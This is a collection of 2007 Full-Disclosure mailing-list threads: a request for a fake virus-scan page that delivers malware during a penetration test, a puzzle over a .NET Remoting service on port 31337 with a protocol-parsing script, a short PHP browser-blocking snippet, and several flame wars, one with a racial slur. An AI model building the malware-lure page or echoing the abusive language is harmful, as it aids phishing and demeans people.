 On 10/31/07, Joshua Tagnore [EMAIL PROTECTED] wrote:
 List,

 Some time ago I remember that someone posted a PoC of a small site that
 had a really nice looking flash animation that performed a virus scan and
 after the virus scan was finished, the user was prompted for a Download
 virus fix? question. After that, of course, a file is sent to the user and
 he got infected with some malware. Right now I'm performing a penetration
 test, and I would like to target some of the users of the corporate LAN, so
 I think this approach is the best in order to penetrate to the LAN.

 I searched google but failed to find the URL, could someone send it to
 me ? Thanks!

 Cheers,
 --
 Joshua Tagnore


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] New term RDV is born

2007-09-28 Thread Simon Smith

Has anyone ever heard of .NET REMOTING running on port 31337? If so,
have you ever seen it legitimate?


- --

- - simon

- --
http://www.snosoft.com



[Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith


Has anyone ever heard of .NET REMOTING running on port 31337? If so,
have you ever seen it legitimate?


- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith

Got output... and it was... no idea what it was... can't paste it due to
confidentiality though.

Fabrizio wrote:
 .NET Remoting is a generic system for different applications to use to
 communicate with one another. It's part of the .NET framework,
 obviously. (not trying to be a smart ass)
 
 I'm gonna take a wild guess and say it's not a good thing..
 
 Connect to it, and see if you get any output, if you haven't already
 done so.
 
 Fabrizio
 
 
 
 On 9/28/07, * Simon Smith* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:
 
 
 Has anyone ever heard of .NET REMOTING running on port 31337? If so,
 have you ever seen it legitimate?
 
 




 



- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith

Right,
It set off alarms with all of my penetration testers hence why we're
researching it. The question I have is, has anyone seen port 31337
respond with the .NET REMOTING banner? Our nmap -A claims that it is
.NET REMOTING... just seems weird...

Anyone know of any backdoors that do that?

The Security Community wrote:
 The last time I saw anything on port 31337 (ELEET) it was during a
 vulnerability assessment.  We shut it down and stopped the assessment.
  Management wouldn't let us investigate, then blew the cover on the
 assessment a week or two later.
 
 It's almost always bad, but you may just have an admin with a stupid
 sense of humor.
 
 31337 should always throw a red flag.
 
 On 9/28/07, Simon Smith [EMAIL PROTECTED] wrote:
 
 Has anyone ever heard of .NET REMOTING running on port 31337? If so,
 have you ever seen it legitimate?
 
 



- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith

Unfortunately I do not have the control or authority to dig into it
further... but your input has been helpful...

Fabrizio wrote:
 If you think it's that critical, (i think it's that critical) start by
 blocking any connections from anywhere to that machine/port. See if
 anyone complains. Check any old firewall logs for that port while you're
 at it. Then continue your investigation!!
 
 Fabrizio
 
 On 9/28/07, *Simon Smith* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED]
 wrote:
 
 Got output... and it was... no idea what it was... can't paste it due to
 confidentiality though.
 
 Fabrizio wrote:
 .NET Remoting is a generic system for different applications to
 use to
 communicate with one another. It's part of the .NET framework,
 obviously. (not trying to be a smart ass)
 
 I'm gonna take a wild guess and say it's not a good thing..
 
 Connect to it, and see if you get any output, if you haven't already
 done so.
 
 Fabrizio
 
 
 
 On 9/28/07, * Simon Smith*  [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
 
 
 Has anyone ever heard of .NET REMOTING running on port 31337? If so,
 have you ever seen it legitimate?
 
 
 
 
 
 
 
 
 
 
 

 



- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith

No way...

are you serious?

;P

[EMAIL PROTECTED] wrote:
 Sounds like you will need to learn how to use debugging and other
 reverse engineering tools dude.  Security gets a little more
 complicated post-nmap.
 
 
 
 On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Got output... and it was... no idea what it was... can't paste it
 due to
 confidentiality though.
 
 Fabrizio wrote:
 .NET Remoting is a generic system for different applications to
 use to
 communicate with one another. It's part of the .NET framework,
 obviously. (not trying to be a smart ass)

 I'm gonna take a wild guess and say it's not a good thing..

 Connect to it, and see if you get any output, if you haven't
 already
 done so.

 Fabrizio



 On 9/28/07, * Simon Smith* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:


 Has anyone ever heard of .NET REMOTING running on port 31337? If
 so,
 have you ever seen it legitimate?


 
 
 
 
 --
 
 - simon
 
 --
 http://www.snosoft.com





- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith

I do... but I don't have time to explain it to you... it's complicated...
post-nmap stuff...

[EMAIL PROTECTED] wrote:
 dunno how do you plan on figuring out what is running there
 
 On Fri, 28 Sep 2007 15:07:34 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Phew... thought you were serious for a moment...
 
 I mean... what more could there be aside from nmap. ;]
 
 [EMAIL PROTECTED] wrote:
 No just kidding lol a lot of people here seem to make money in
 this
 business.

 On Fri, 28 Sep 2007 15:01:01 -0400 Simon Smith
 [EMAIL PROTECTED]
 wrote:
 No way...
 are you serious?
 ;P
 [EMAIL PROTECTED] wrote:
 Sounds like you will need to learn how to use debugging and
 other
 reverse engineering tools dude.  Security gets a little more
 complicated post-nmap.



 On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith
 [EMAIL PROTECTED]
 wrote:
 Got output... and it was... no idea what it was... can't
 paste
 it
 due to
 confidentiality though.
 Fabrizio wrote:
 .NET Remoting is a generic system for different
 applications
 to
 use to
 communicate with one another. It's part of the .NET
 framework,
 obviously. (not trying to be a smart ass)

 I'm gonna take a wild guess and say it's not a good
 thing..
 Connect to it, and see if you get any output, if you haven't
 already
 done so.

 Fabrizio



 On 9/28/07, * Simon Smith* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:


 Has anyone ever heard of .NET REMOTING running on port
 31337?
 If
 so,
 have you ever seen it legitimate?



 --
 - simon
 --
 http://www.snosoft.com



 --
 - simon
 --
 http://www.snosoft.com
 
 
 
 
 --
 
 - simon
 
 --
 http://www.snosoft.com





- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith

Phew... thought you were serious for a moment...

I mean... what more could there be aside from nmap. ;]

[EMAIL PROTECTED] wrote:
 No just kidding lol a lot of people here seem to make money in this
 business.
 
 On Fri, 28 Sep 2007 15:01:01 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 No way...
 
 are you serious?
 
 ;P
 
 [EMAIL PROTECTED] wrote:
 Sounds like you will need to learn how to use debugging and other
 reverse engineering tools dude.  Security gets a little more
 complicated post-nmap.

 On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Got output... and it was... no idea what it was... can't paste it
 due to confidentiality though.

 Fabrizio wrote:
 .NET Remoting is a generic system for different applications to use
 to communicate with one another. It's part of the .NET framework,
 obviously. (not trying to be a smart ass)

 I'm gonna take a wild guess and say it's not a good thing..
 Connect to it, and see if you get any output, if you haven't already
 done so.

 Fabrizio

 On 9/28/07, * Simon Smith* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 Has anyone ever heard of .NET REMOTING running on port 31337? If so,
 have you ever seen it legitimate?


- --

- - simon

- --
http://www.snosoft.com
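
Fabrizio's suggestion quoted above is to connect and look at what comes back. As an added example (not code from the thread), this Python parser checks whether bytes captured from such a listener's traffic carry the .NET Remoting TCP-channel frame preamble; the field layout is taken from Microsoft's published [MS-NRTP] specification, and the sample captures are constructed.

```python
import struct
from dataclasses import dataclass
from typing import Optional

PROTOCOL_ID = b".NET"   # ProtocolId 0x54454E2E as it appears on the wire
OPERATIONS = {0: "Request", 1: "OneWayRequest", 2: "Reply"}
DISTRIBUTIONS = {0: "NotChunked", 1: "Chunked"}
# ProtocolId(4) MajorVersion(1) MinorVersion(1) OperationType(2) ContentDistribution(2)
FIXED_LEN = 10


class NotRemoting(ValueError):
    """The bytes do not parse as an MS-NRTP TCP frame preamble."""


@dataclass
class Preamble:
    major: int
    minor: int
    operation: str
    distribution: str
    content_length: Optional[int]   # None when the body is sent chunked


def parse_preamble(data: bytes) -> Preamble:
    """Parse the fixed start of a TCP-channel frame, rejecting anything else."""
    if len(data) < FIXED_LEN:
        raise NotRemoting(f"need {FIXED_LEN} bytes, got {len(data)}")
    if data[:4] != PROTOCOL_ID:
        raise NotRemoting("ProtocolId is not '.NET'")
    major, minor, op, dist = struct.unpack_from("<BBHH", data, 4)
    if (major, minor) != (1, 0):
        raise NotRemoting(f"unexpected version {major}.{minor}")
    if op not in OPERATIONS or dist not in DISTRIBUTIONS:
        raise NotRemoting(f"unknown OperationType/ContentDistribution {op}/{dist}")
    length = None
    if DISTRIBUTIONS[dist] == "NotChunked":
        # ContentLength (4 bytes, little-endian) follows only for unchunked bodies.
        if len(data) < FIXED_LEN + 4:
            raise NotRemoting("truncated before ContentLength")
        (length,) = struct.unpack_from("<I", data, FIXED_LEN)
    return Preamble(major, minor, OPERATIONS[op], DISTRIBUTIONS[dist], length)


def classify(data: bytes) -> str:
    """One-line triage verdict for a captured byte string."""
    try:
        p = parse_preamble(data)
    except NotRemoting as why:
        return f"not MS-NRTP: {why}"
    size = "chunked" if p.content_length is None else f"{p.content_length} bytes"
    return f"MS-NRTP {p.major}.{p.minor} {p.operation}, body {size}"


# Constructed captures, not taken from any real host.
SAMPLES = {
    "reply": b".NET\x01\x00" + struct.pack("<HHI", 2, 0, 512),
    "chunked": b".NET\x01\x00" + struct.pack("<HH", 0, 1),
    "ssh": b"SSH-2.0-OpenSSH_4.7\r\n",
    "short": b".NET\x01",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:8} {classify(blob)}")
```

A match identifies the framing only; whether the listener is legitimate still depends on which process owns the port and why it was configured there.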



Re: [Full-disclosure] .NET REMOTING on port 31337

2007-09-28 Thread Simon Smith
Sorry,
Bad Troll... no more food...

[EMAIL PROTECTED] wrote:
 fascinating tell me more
 
 On Fri, 28 Sep 2007 15:36:07 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 I don't have any techniques...
 
 [EMAIL PROTECTED] wrote:
 educate me dude i bet i'll win this one.

 are your techniques more advanced than the anvil ids suite?

 On Fri, 28 Sep 2007 15:22:23 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 I do... but I don't have time to explain it to you... its
 complicated... post-nmap stuff...

 [EMAIL PROTECTED] wrote:
 dunno how do you plan on figuring out what is running there

 On Fri, 28 Sep 2007 15:07:34 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Phew... thought you were serious for a moment...
 I mean... what more could there be aside from nmap. ;]

 [EMAIL PROTECTED] wrote:
 No just kidding lol a lot of people here seem to make money in this
 business.

 On Fri, 28 Sep 2007 15:01:01 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 No way...
 are you serious?
 ;P

 [EMAIL PROTECTED] wrote:
 Sounds like you will need to learn how to use debugging and other
 reverse engineering tools dude.  Security gets a little more
 complicated post-nmap.

 On Fri, 28 Sep 2007 14:21:52 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Got output... and it was... no idea what it was... can't paste it
 due to confidentiality though.

 Fabrizio wrote:
 .NET Remoting is a generic system for different applications to use
 to communicate with one another. It's part of the .NET framework,
 obviously. (not trying to be a smart ass)

 I'm gonna take a wild guess and say it's not a good thing..
 Connect to it, and see if you get any output, if you haven't already
 done so.

 Fabrizio

 On 9/28/07, * Simon Smith* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 Has anyone ever heard of .NET REMOTING running on port 31337? If so,
 have you ever seen it legitimate?


- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] [Dailydave] Hacking software is lame -- try medical research...

2007-09-21 Thread Simon Smith
Just like technology research (hacking)... but... if you are the one
that finds a cure, you'll make your buck too.

M. Shirk wrote:
 There is more money to be made in the treatment of a disease, than
 actually finding a cure.
 
 Remind you of anything?
 
 Shirkdog
 ' or 1=1--
 http://www.shirkdog.us
 
 Date: Fri, 21 Sep 2007 10:37:20 -0700
 From: [EMAIL PROTECTED]
 To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
 Subject: [Dailydave] Hacking software is lame -- try medical research...

 Some interesting discussion came up on some security lists this week
 and it got me to thinking. Yes, hacking software is lame. Cool, so
 you found some vulnerabilities in some widely distributed application,
 service, or OS and it is patched just as quickly. Why don't we spend
 our time and valuable energy researching cures for rare or popular
 diseases instead? For instance, my brother (Jon Hermansen) has a very
 rare disease called Langerhans Cell Histiocytosis. It is also better
 known as LCH. It can be identified as causing such further diseases
 as Diabetes Insipidus, which is also uncommon (not sugar diabetes).
 Have you heard of these diseases before? Let me educate you…

 General Information:
 http://en.wikipedia.org/wiki/Langerhans_cell_histiocytosis
 http://en.wikipedia.org/wiki/Diabetes_insipidus

 Seven Part Video Series:
 http://youtube.com/watch?v=KkBRqZS8nfM
 http://youtube.com/watch?v=w1h6ZjxF-To
 http://youtube.com/watch?v=0ojbJpERlt8
 http://youtube.com/watch?v=dzUqdYofMCQ
 http://youtube.com/watch?v=lNhzwNYhi0M
 http://youtube.com/watch?v=nY9DDEhShcE
 http://youtube.com/watch?v=5_8SEYyEZGI

 And even worse than this, a friend of mine who is a PhD student in
 Math at Berkeley has an even rarer disease known as Gaucher's Disease.
 This costs $550,000 / year to treat. That's a hefty bill every year
 (you make that much doing security vulns?), and some insurance
 companies might refuse to accept you due to pre-existing conditions.
 So guess what, my friend does not have health insurance and has not
 been treated for two years. A genius might die. That's ludicrous.

 http://en.wikipedia.org/wiki/Gaucher's_disease
 http://youtube.com/watch?v=0nX6QM5iVaU

 If we consider ourselves decent hackers, why don't we put our
 efforts toward helping cure this and other diseases rather than some
 very simple programming vulnerability? Is it because then we would
 have to reinvent a whole new slew of tools and re-orient/re-educate
 ourselves to be successful? Think about it…
 --
 Kristian Erik Hermansen
 ___
 Dailydave mailing list
 [EMAIL PROTECTED]
 http://lists.immunitysec.com/mailman/listinfo/dailydave
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Media Defender pwned big time

2007-09-18 Thread Simon Smith
This was originally reported to Daily Dave by [EMAIL PROTECTED]

[EMAIL PROTECTED] wrote:
 After the email leak[1], a phone call was leaked[2], allegedly 
 between Ben Grodsky of Media Defender and New York State General 
 Attorney.
 
 here is a teaser transcript:
 
 Ben Grodsky: Yeah it seems...I mean, from our telephone call 
 yesterday it seems that uhm... we all pretty much came to the 
 conclusion that probably was ehm... caught in the email 
 transmission because the attacker, I guess what you call, the 
 Swedish IP, the attacker uhm... knew the login and the IP address 
 and port uhm... but they weren't able to get in because we had 
 changed the password on our end, you know, following our normal 
 security protocols uhm... when we are making secure transactions 
 like these on the first login we'll change the password  so, 
 obviously, well not obviously but, it seems that, most likely 
 scenario is that, at some  point that email was ehm... intercepted. 
 You know just because it is,.. probably it was going through the 
 public Internet and there wasn't any sort of encryption key used to 
 ehm... protect the data in that email.
 
 Ben Grodsky: ...if  you guys are comfortable just communicating 
 with us by phone, anything that is really really sensitive we can 
 just communicate in this fashion...
 
 Ben Grodsky: OK [confused, taking notes]. So, you are gonna 
 disable password authentication and enable public key?
 
 Ben Grodsky: ...that part has... has not been compromised in any 
 way. I mean, the communications between our offices in Santa Monica 
 and our data centers have not been compromised in any way and all 
 those communications to NY, to your offices, are secured. The only 
 part that was compromised was...was the email communications about 
 these things.
 
 Ben Grodsky:  ...All we can say for sure Media Defender's mail 
 server has not been hacked or compromised...
 
 [in answer to the question "What kind of IDS you guys are running?"]
 Ben Grodsky:  Ehm...I don't know. Let me look into that.
 
 
 [1] http://torrentfreak.com/mediadefender-emails-leaked-070915/
 [2] http://thepiratebay.org/tor/3809004/MediaDefender.Phonecall-MDD
 


- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Symantec Contact?

2007-09-18 Thread Simon Smith
I haven't been following this thread, but what about submitting the
details to them in the same way that you'd submit a vulnerability. I'd
find it hard to believe that they'd just ignore it.

Morning Wood wrote:
 What's really Sad is that Symantec does not have an option for the
 general public (i.e. Independent Virus Researchers) to submit virus
 samples .

 You have to either
 A. Submit it through their product.
 B. Have a Corporate Support contract.

 Guess they don't want new samples.
 
 agree 100%, stupidity
 


- --

- - simon

- --
http://www.snosoft.com



Re: [Full-disclosure] Unreal: a movement to block Firefox

2007-09-11 Thread Simon Smith
Just spoof your userAgent...

<?php
// Redirect any request whose User-Agent header mentions Firefox.
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strstr($userAgent, 'firefox'))
  {
    header("Location: http://whyfirefoxisblocked.com");
    exit();
  }
?>




mbs wrote:
 The whole concept of blocking 12.41% of Internet users (see 
 http://en.wikipedia.org/wiki/Usage_share_of_web_browsers ) seems 
 laughable, and a bad idea.
 
 What I don't find amusing is Chris Soghoian's statement "Users of
 advertisement skipping technology are essentially engaged in theft of
 resources."
 
 I don't know about anyone else, but I happen to pay for my internet 
 access. If I choose not to waste my bandwidth (and my time) with 
 unwanted content, I would suggest that is my right.
 
 
 
 Micheal Espinola Jr wrote:
 http://whyfirefoxisblocked.com/

 http://www.cnet.com/8301-13739_1-9770502-46.html?part=rss&subj=news&tag=2547-1_3-0-5

   
 


-- 

- simon

--
http://www.snosoft.com



[Full-disclosure] What do you guys make of this?

2007-09-06 Thread Simon Smith
So, what's up with Russia these days? I'm hearing more and more about
Russia on the news. Is this just propaganda or is something really going on?

http://news.bbc.co.uk/2/hi/uk_news/6957589.stm

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] What do you guys make of this?

2007-09-06 Thread Simon Smith
I agree with what you said for the most part. I also know that most
Russian people are very happy with what Putin is doing. Thus far, in
their eyes, he's one of the best leaders that they've had in ages. Do
you think that Russia is actually going to become a threat again? Do you
think this will go back to the cold-war like times?

Joel R. Helgeson wrote:
 There was a time in foreign policy where no country, no diplomat would make
 a foreign policy decision without first asking "what does Russia think of
 this?". Well, Russia is no longer a super power, the fall from which left
 Putin feeling excluded. He's always wanted to get Russia back to superpower
 status, he wants his Mother Russia to be significant again.
 
 For years, the Russian economy was cash strapped. Just recently Putin
 revamped the entire tax system and implemented a 12% flat tax. For the first
 time since the collapse, the tax revenues are POURING in. They now have
 enough gas to fuel a plane, and now they want to get back into being viewed
 as a superpower, to be 'feared', they desperately want to matter again, to
 be important.
 
 So, they're acting out in an aggressive manner - using tried and true cold
 war era tactics.  It comes across to me as childish, throwing a fit just to
 get attention.
 
 It is not propaganda, Russia is just trying to say We're BAACK!
 And this time, we've got 31337 H4x0rz!
 
 Joel Helgeson
 952-858-9111
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Simon Smith
 Sent: Thursday, September 06, 2007 11:47 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] What do you guys make of this?
 
 So, whats up with Russia these days? I'm hearing more and more about
 Russia on the news. Is this just propaganda or is something really going on?
 
 http://news.bbc.co.uk/2/hi/uk_news/6957589.stm
 
 - simon
 
 --
 http://www.snosoft.com
 
 


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory

2007-08-29 Thread Simon Smith
I LOVE THE DMCA!

Kevin Finisterre (lists) wrote:
 heh who would do such a thing?
 
 Guess we all get to wait and see who the first Guinea pig is gonna be.
 
 Hope germany has an EFF / Granick floating around to fight off some  
 of this nonsense.
 -KF
 
 On Aug 28, 2007, at 6:49 PM, Blue Boar wrote:
 
 I remember people being all paranoid about the DMCA. They were worried
 security researchers would be sued for trying to release vulnerability
 information. But since that turned out to be unfounded, I guess we don't
 have to worry about the German thing. ;)

  BB

 Kevin Finisterre (lists) wrote:
 Would you have honestly provided *MORE* detail prior to the law being
 in effect?

 Doesn't the law refer to things that are intended to be used for
 illegal activity?

 I don't recall the advisories being any more verbose pre law

 Thanks.
 -KF

 On Aug 27, 2007, at 4:41 PM, Sergio Alvarez wrote:

 Hi 3APA3A,

 It was a mistake in the advisory,
 It should say:

 Integer cast around in UPX packed files parsing

 I ask for apologies for the mistake.
 Unfortunately we can't give more details about the vulnerability
 because the German Law (§202)

 Cheers,
   Sergio




-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Skype - the voip company

2007-08-17 Thread Simon Smith
Well,
It's not just their logins. They also removed all downloads from their
site and for a while my skype in number was not working. Something was
up and it didn't seem to be too good.

Nikolay Kichukov wrote:
 Hello,
 It does not seem to be OS dependent, as I am running debian lenny/sid
 using skype version 1.4 Beta and it cannot connect.
 
 Cheers,
 -Nik
 
 Tonu Samuel wrote:
 On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote:
 Hello Simon

 Simon Smith wrote:
 Greetings,
Does anyone know any more details about the current skype outage, other
 than what is being presented on their web-site? It appears that all
 I guess Problems with Skype login [1] does tell a little bit more.

[1] 
 http://heartbeat.skype.com/2007/08/problems_with_skype_login.html
 Still no one exactly knows what is going on. But there are speculations
 that Microsoft intentionally broke it with latest patches and Skype
 working hard to find solution.

 I do not have anything better than all others, so take it as rumour only
 and think twice if you use closed source including windows or skype.

Tõnu



-- 

- simon

--
http://www.snosoft.com


[Full-disclosure] Skype - the voip company

2007-08-16 Thread Simon Smith
Greetings,
Does anyone know any more details about the current skype outage, other
than what is being presented on their web-site? It appears that all
skype-in telephone numbers are reporting out of service, their
downloads are disabled, and login to the service is disabled.

Thanks in advance.



- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Halvar Flake denied entry to USA for BlackHat

2007-07-30 Thread Simon Smith
A president has an affair and we nearly impeach him. Another president ruins
the country, destabilizes the middle-east even more, takes away our rights
and freedom, yet we keep him in office. What gives?

Don't get me wrong, I love the US and all it has to offer me as a citizen,
but like most citizens I'm growing increasingly frustrated with the Bush
administration. When will things actually get better? When will people start
to use their voice to make things right?


On 7/30/07 1:21 PM, Kristian Hermansen [EMAIL PROTECTED]
wrote:

 http://addxorrol.blogspot.com/2007/07/ive-been-denied-entry-to-us-essentially.html




Re: [Full-disclosure] Am I missing anything ?

2007-07-24 Thread Simon Smith
My other hand is called Valdis :]


On 7/24/07 12:06 PM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 On Mon, 23 Jul 2007 18:47:33 EDT, Kevin Finisterre (lists) said:
 
 Yeah... Adriel loves the cock.
 
 What's he call his *other* hand? :)
 
 (Well dammit, I got this big bag of Purina Troll Chow, and I need to get
 rid of it *somehow* :)




Re: [Full-disclosure] Am I missing anything ?

2007-07-23 Thread Simon Smith
Local and Remote file inclusion, yes, you are actually missing a bunch of
things.. ;)


On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote:

 Hi All,
Just wondered if I am missing anything important. Am planning to give
 talk on web security.
 Is there any other technique other than the following I have to speak
 about ?
 
 1)XSS
 2)CSRF
 3)SQL Injection
 4)AJAX/JSON hijacking
 5)HTTP response splitting
 6)RFI
 7)CRLF
 8)MITM
 
 Thanks
 Deepan
 



Re: [Full-disclosure] Am I missing anything ?

2007-07-23 Thread Simon Smith
Kid, your posts continue to clearly demonstrate your immaturity.

http://www.security-express.com/archives/fulldisclosure/2007-07/0404.html
http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0372.html
http://seclists.org/fulldisclosure/2007/Jul/0369.html
http://seclists.org/fulldisclosure/2007/Jul/0402.html

It's too bad that you're such a coward man...




On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote:

 Doesn't RFI stand for remote file inclusion you ignorant jackass?
 
 J
 
 On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Local and Remote file inclusion, yes, you are actually missing a bunch of
 things.. ;)

 On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote:

 Hi All,
 Just wondered if I am missing anything important. Am planning to give
 talk on web security.
 Is there any other technique other than the following I have to speak
 about ?
 
 1)XSS
 2)CSRF
 3)SQL Injection
 4)AJAX/JSON hijacking
 5)HTTP response splitting
 6)RFI
 7)CRLF
 8)MITM
 
 Thanks
 Deepan
 
 



Re: [Full-disclosure] Am I missing anything ?

2007-07-23 Thread Simon Smith
You are right with respect to your RFI comment... But as far as me learning
anything, don't count on it. I am after all an ignorant jackass remember?


On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote:

 But I am right, am I not? Just pointing out what everyone else was
 thinking already :)
 
 Anyway, if you are implying I am immature because of my ad homonym,
 please refer to the following:
 
 http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0380.html
 
 You should have learned from KF by now the infosec mantra 'live by
 the niggerdong, die by the niggerdong'
 
 J
 
 On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Kid, your posts continue to clearly demonstrate your immaturity.
 
 http://www.security-express.com/archives/fulldisclosure/2007-07/0404.html
 http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0372.html
 http://seclists.org/fulldisclosure/2007/Jul/0369.html
 http://seclists.org/fulldisclosure/2007/Jul/0402.html
 
 Its too bad that you're such a coward man...
 
 
 
 
 On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED]
 wrote:
 
 Doesn't RFI stand for remote file inclusion you ignorant jackass?

 J

 On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Local and Remote file inclusion, yes, you are actually missing a bunch of
 things.. ;)

 On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote:

 Hi All,
 Just wondered if I am missing anything important. Am planning to give
 talk on web security.
 Is there any other technique other than the following I have to speak
 about ?
 
 1)XSS
 2)CSRF
 3)SQL Injection
 4)AJAX/JSON hijacking
 5)HTTP response splitting
 6)RFI
 7)CRLF
 8)MITM
 
 Thanks
 Deepan
 
 



Re: [Full-disclosure] Am I missing anything ?

2007-07-23 Thread Simon Smith
Right kid... Can we also agree that you are immature? I mean, we can't lay
this to rest unless we come to a compromise. Frankly, I don't feel that it
would be a compromise if you didn't come half way in this relationship.

While we're at it... Lets also agree that you're a coward, probably fat and
lethargic... With no real friends... Who never really gets laid?

Yeah I think that about sums it up... ;]



On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote:

 No, I forgot. I now remember, thank you. As long as we agree that
 you were wrong, I was right, and you are an ignorant jackass who
 may or may not have had sexual relations with the Oreo named KF, I
 see no need for this thread to continue.
 
 J
 
 On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 You are right with respect to your RFI comment... But as far as me learning
 anything, don't count on it. I am after all an ignorant jackass remember?

 On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote:

 But I am right, am I not? Just pointing out what everyone else was
 thinking already :)

 Anyway, if you are implying I am immature because of my ad homonym,
 please refer to the following:

 http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0380.html
 
 You should have learned from KF by now the infosec mantra 'live
 by
 the niggerdong, die by the niggerdong'
 
 J
 
 On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Kid, your posts continue to clearly demonstrate your immaturity.

 http://www.security-express.com/archives/fulldisclosure/2007-07/0404.html
 http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0372.html
 http://seclists.org/fulldisclosure/2007/Jul/0369.html
 http://seclists.org/fulldisclosure/2007/Jul/0402.html

 Its too bad that you're such a coward man...

 On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote:

 Doesn't RFI stand for remote file inclusion you ignorant jackass?

 J

 On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Local and Remote file inclusion, yes, you are actually missing a bunch of
 things.. ;)

 On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote:

 Hi All,
 Just wondered if I am missing anything important. Am planning to give
 talk on web security.
 Is there any other technique other than the following I have to speak
 about ?
 
 1)XSS
 2)CSRF
 3)SQL Injection
 4)AJAX/JSON hijacking
 5)HTTP response splitting
 6)RFI
 7)CRLF
 8)MITM
 
 Thanks
 Deepan
 
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Am I missing anything ?

2007-07-23 Thread Simon Smith
Oh so now you're calling me old?


On 7/23/07 7:37 PM, Joey Mengele [EMAIL PROTECTED] wrote:

 LOLOLOLOLOL. I submit, you have proven your maturity.
 
 J
 
 On Mon, 23 Jul 2007 18:48:14 -0400 Simon Smith [EMAIL PROTECTED]
 wrote:
 Right kid... Can we also agree that you are immature? I mean, we can't lay
 this to rest unless we come to a compromise. Frankly, I don't feel that it
 would be a compromise if you didn't come half way in this relationship.
 
 While we're at it... Let's also agree that you're a coward, probably fat and
 lethargic... With no real friends... Who never really gets laid?
 
 Yeah I think that about sums it up... ;]
 
 
 
 On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED]
 wrote:
 
 No, I forgot. I now remember, thank you. As long as we agree
 that
 you were wrong, I was right, and you are an ignorant jackass who
 may or may not have had sexual relations with the Oreo named KF,
 I
 see no need for this thread to continue.
 
 J
 
 On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith
 [EMAIL PROTECTED]
 wrote:
